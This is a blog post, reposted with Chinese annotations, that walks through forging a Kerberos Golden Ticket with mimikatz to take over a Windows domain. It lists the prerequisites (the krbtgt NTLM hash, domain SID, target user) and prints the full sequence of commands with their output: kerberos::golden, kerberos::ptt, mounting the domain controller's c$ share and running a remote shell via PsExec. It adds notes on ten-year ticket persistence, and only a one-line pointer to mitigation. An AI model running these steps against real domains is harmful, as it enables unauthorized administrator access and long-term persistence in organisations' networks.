mimikatz获取金票据
Introduction(引言)
We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain.
mimikata提供了金票据功能,通过这项技术,我们可以访问域中的任意资源。
Here is the list of what you need to make it work:(获取金票据需要以下四个要素)
- krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump)(krbtgt 用户的NTLM Hash)
- Domain name(域名)
- Domain's SID(域的SID)
- Username that we'd like to impersonate(我们想要仿冒的用户名)
As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while.
As you know mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets we can easily replay those on another computer and get access to the same resource. See Google for more info.
Attack
When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example:
First we look for a domain administrator:(查询域管理员)C:\Users\evilhacker>net group "domain admins" /domain The request will be processed at a domain controller for domain ctu.domain. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator schema.Admin Jack.Bauer
Administrator is good for us, so we create a TGT ticket with the Kerberos user's hashed password and make it look like as if Administrator asked for an access to a share. Now let's get the Domain SID. Easiest way to do that is just use: "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe come in handy:
C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN PsGetSid v1.44 - Translates SIDs to names and vice versa Copyright (C) 1999-2008 Mark Russinovich Sysinternals - www.sysinternals.com SID for CTU.DOMAIN\CTU.DOMAIN: S-1-1-12-123456789-1234567890-123456789 (获取域的SID,也可以通过whoami /user的命令获取用户SID,然后删除最后一个‘-’后面的部分)
Now we have everything to start the attack. First we list the existing Kerberos tickets, if there is any we can those with the purge command (but it is not necessary) and then we can create the Golden Ticket and pass that.
C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 14 modules * * */ mimikatz # kerberos::list [00000000] - 17 Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN Client Name : evilhacker @ CTU.DOMAIN Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ; ... mimikatz # kerberos::purge Ticket(s) purge for current session is OK 生成票据 mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi Admin : Administrator Domain : CTU.DOMAIN SID : S-1-1-12-123456789-1234567890-123456789 krbtgt : deadbeefboobbabe003133700009999 Ticket : Administrator.kiribi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! 导入票据 mimikatz # kerberos::ptt Administrator.kiribi Ticket 'Administrator.kiribi' successfully submitted for current session mimikatz # kerberos::list [00000000] - 17 Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN Client Name : Administrator @ CTU.DOMAIN Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; mimikatz # kerberos::tgt Keberos TGT of current session : Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1 /24/2034 12:52:13 PM Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN Target Name (--) : @ CTU.DOMAIN Client Name (01) : Administrator ; @ CTU.DOMAIN Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; Session Key (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37 Ticket (00 - 17) : [...] (NULL session key means allowtgtsessionkey is not set to 1) Now you can mount any share or use any RPC related tool that you like. 试着访问域内的资源 C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$ The command completed successfully. C:\Users\evilhacker\Documents\mimikatz>net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK I: \\dc01.ctu.domain\c$ Microsoft Windows Network The command completed successfully.
OR
执行远程的cmd C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe PsExec v2.0 - Execute processes remotely Copyright (C) 2001-2013 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>hostname DC01 C:\Windows\system32>exit cmd.exe exited on dc01.ctu.domain\ with error code 0.
Some additional notes: - Password change on behalf of the user does not have any impact on the ticket, the access can be granted without the user's password (or hash)
- Mimikatz does not support other user than a Domain Admin (it is hardcoded in the source), by the way I managed to impersonate a domain controller //with some malfunctions.
- The TGT ticket is issued for 10 years and can be renewed for more 10 years
- Existing sessions cannot be overridden. Already attached shares have to be detached first and reattached again.
- Cached tickets sometimes cannot be purged so the computer has to be restarted (for example if there is a group policy that attaches different shares then those shares cannot be mounted as the impersonated user)
- Mimikatz does not require SE_DEBUG or other privilege to create and pass TGT
Mitigation
A good mitigation how-to from CERT-EU: Protection from Kerberos Golden Ticket
Greetings
Thanks to Kristof Feiszt for support, Benjamin `gentilkiwi` Delpy for mimikatz ;)
Author
Balazs Bucsay - mimikatz[!at!]rycon[!dot!]hu - http://rycon.hu/ - 2014. 01. 24.